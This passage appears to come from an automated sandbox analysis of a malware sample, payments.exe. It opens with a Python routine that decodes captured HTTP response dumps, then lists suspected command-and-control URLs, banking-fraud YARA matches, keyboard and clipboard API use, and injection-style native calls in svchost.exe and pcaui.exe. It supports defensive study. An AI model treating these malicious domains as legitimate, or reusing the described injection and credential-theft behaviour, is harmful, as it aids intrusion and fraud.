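    "bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 "
    "b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 "
    "1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 "
    "19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e "
    "18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 "
    "02 00 00 0d 0a 30 0d 0a 0d 0a"
)


def dechunk(data: bytes) -> bytes:
    """Remove HTTP/1.1 chunked transfer framing (RFC 9112 section 7.1).

    Each chunk is "<hex-size>[;ext]\\r\\n<size bytes>\\r\\n"; a zero-size
    chunk ends the body. A dump cut off before the terminating chunk is
    returned as far as it goes, because sandbox reports truncate long captures.
    """
    out = bytearray()
    pos = 0
    while True:
        end = data.find(b"\r\n", pos)
        if end == -1:
            break                      # truncated dump: no further chunk header
        size_field = data[pos:end].split(b";", 1)[0].strip()
        if not size_field:
            break
        size = int(size_field, 16)
        if size == 0:
            break                      # last-chunk marker
        start = end + 2
        out += data[start:start + size]
        pos = start + size + 2         # skip the CRLF that closes the chunk
    return bytes(out)


def gzip_trailer_isize(stream: bytes) -> int:
    """Uncompressed length recorded in the last 4 bytes of a gzip member (mod 2**32)."""
    return struct.unpack("<I", stream[-4:])[0]


def decode_data_raw(hex_dump: str) -> dict:
    """Turn a report 'Data Raw' hex string into the decoded response body."""
    raw = bytes.fromhex(hex_dump)      # whitespace between byte pairs is ignored
    payload = dechunk(raw)
    if payload[:2] != b"\x1f\x8b":
        raise ValueError("payload is not gzip-compressed")
    body = gzip.decompress(payload)    # also verifies the CRC32 and ISIZE trailer
    return {
        "chunk_payload_len": len(payload),
        "isize": gzip_trailer_isize(payload),
        "body": body,
    }


if __name__ == "__main__":
    result = decode_data_raw(RAW_HEX)
    print(result["chunk_payload_len"], result["isize"], len(result["body"]))
    print(result["body"].decode("ascii"))
```

The chunk header "a7" announces 167 bytes, which is exactly the gzip member present, and the trailer's ISIZE field reads 0x224 = 548, the same size as the uncompressed nginx 404 page with its six padding comments in the 15:24:05 response. When a dump is cut short (as the 15:24:12 entry is, which lacks the terminating 0-chunk), `dechunk` still returns whatever chunks were captured, but `gzip.decompress` will then fail on the truncated member; use `zlib.decompressobj(16 + zlib.MAX_WBITS)` if partial output is wanted in that case.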
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/28903/search.png)
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/29590/bg1.png)
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                Source: XhwUfLdILQipZF.exe, 00000006.00000002.3803049222.00000000056B4000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.3kw40881107247y.click
                Source: XhwUfLdILQipZF.exe, 00000006.00000002.3803049222.00000000056B4000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.3kw40881107247y.click/6wln/
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.Matteicapital.online
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.000000000611A000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.000000000471A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.canadavinreport.site/cvhb/?bBw=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.matteicapital.online/Angel_Investors.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1S
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.matteicapital.online/Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxw
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.matteicapital.online/Funds.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxwvd
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.matteicapital.online/Home_Equity_Rates.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.matteicapital.online/Interest.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimx
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.matteicapital.online/__media__/design/underconstructionnotice.php?d=matteicapital.online
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.matteicapital.online/__media__/js/trademark.php?d=matteicapital.online&type=ns
                Source: pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdn.consentmanager.net
                Source: pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://delivery.consentmanager.net
                Source: XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://dts.gnpge.com
                Source: pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: pcaui.exe, 00000004.00000002.3794437127.00000000028E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: pcaui.exe, 00000004.00000002.3794437127.0000000002907000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: pcaui.exe, 00000004.00000003.1651099850.0000000007619000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: pcaui.exe, 00000004.00000002.3794437127.00000000028E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: pcaui.exe, 00000004.00000002.3794437127.00000000028E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: pcaui.exe, 00000004.00000002.3794437127.00000000028E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: pcaui.exe, 00000004.00000002.3794437127.0000000002907000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: pcaui.exe, 00000004.00000002.3802641063.00000000057AE000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003DAE000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.bt.cn/?from=404
                Source: pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: pcaui.exe, 00000004.00000002.3802641063.00000000052F8000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.00000000038F8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CE6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, | 0_2_00CE6B0C
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CE6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, | 0_2_00CE6D07
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CD2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, | 0_2_00CD2B37
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CFF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, | 0_2_00CFF7FF

                E-Banking Fraud

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000004.00000002.3800852385.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1455387044.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3793634224.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3800786167.0000000004370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3803049222.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1456263515.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1455910755.0000000003620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3800781510.0000000003710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\payments.exe | Code function: This is a third-party compiled AutoIt script. | 0_2_00C93D19
                Source: payments.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: payments.exe, 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_c3fa260d-7
                Source: payments.exe, 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_e30df9b6-e
                Source: payments.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_5e84a54c-3
                Source: payments.exe | String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_5bedbacf-4
                Source: initial sample | Static PE information: Filename: payments.exe
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042C893 NtClose, | 2_2_0042C893
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772B60 NtClose,LdrInitializeThunk, | 2_2_03772B60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk, | 2_2_03772DF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk, | 2_2_037735C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03774340 NtSetContextThread, | 2_2_03774340
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03774650 NtSuspendThread, | 2_2_03774650
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772BF0 NtAllocateVirtualMemory, | 2_2_03772BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772BE0 NtQueryValueKey, | 2_2_03772BE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772BA0 NtEnumerateValueKey, | 2_2_03772BA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772B80 NtQueryInformationFile, | 2_2_03772B80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772AF0 NtWriteFile, | 2_2_03772AF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772AD0 NtReadFile, | 2_2_03772AD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772AB0 NtWaitForSingleObject, | 2_2_03772AB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772F60 NtCreateProcessEx, | 2_2_03772F60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772F30 NtCreateSection, | 2_2_03772F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772FE0 NtCreateFile, | 2_2_03772FE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772FB0 NtResumeThread, | 2_2_03772FB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772FA0 NtQuerySection, | 2_2_03772FA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772F90 NtProtectVirtualMemory, | 2_2_03772F90
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772E30 NtWriteVirtualMemory, | 2_2_03772E30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772EE0 NtQueueApcThread, | 2_2_03772EE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772EA0 NtAdjustPrivilegesToken, | 2_2_03772EA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772E80 NtReadVirtualMemory, | 2_2_03772E80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772D30 NtUnmapViewOfSection, | 2_2_03772D30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772D10 NtMapViewOfSection, | 2_2_03772D10
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772D00 NtSetInformationFile, | 2_2_03772D00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772DD0 NtDelayExecution, | 2_2_03772DD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772DB0 NtEnumerateKey, | 2_2_03772DB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772C70 NtFreeVirtualMemory, | 2_2_03772C70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772C60 NtCreateKey, | 2_2_03772C60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772C00 NtQueryInformationProcess, | 2_2_03772C00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772CF0 NtOpenProcess, | 2_2_03772CF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772CC0 NtQueryVirtualMemory, | 2_2_03772CC0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772CA0 NtQueryInformationToken, | 2_2_03772CA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03773010 NtOpenDirectoryObject, | 2_2_03773010
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03773090 NtSetValueKey, | 2_2_03773090
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037739B0 NtGetContextThread, | 2_2_037739B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03773D70 NtOpenThread, | 2_2_03773D70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03773D10 NtOpenProcessToken, | 2_2_03773D10
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04634650 NtSuspendThread,LdrInitializeThunk, | 4_2_04634650
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_04634340 NtSetContextThread,LdrInitializeThunk, | 4_2_04634340
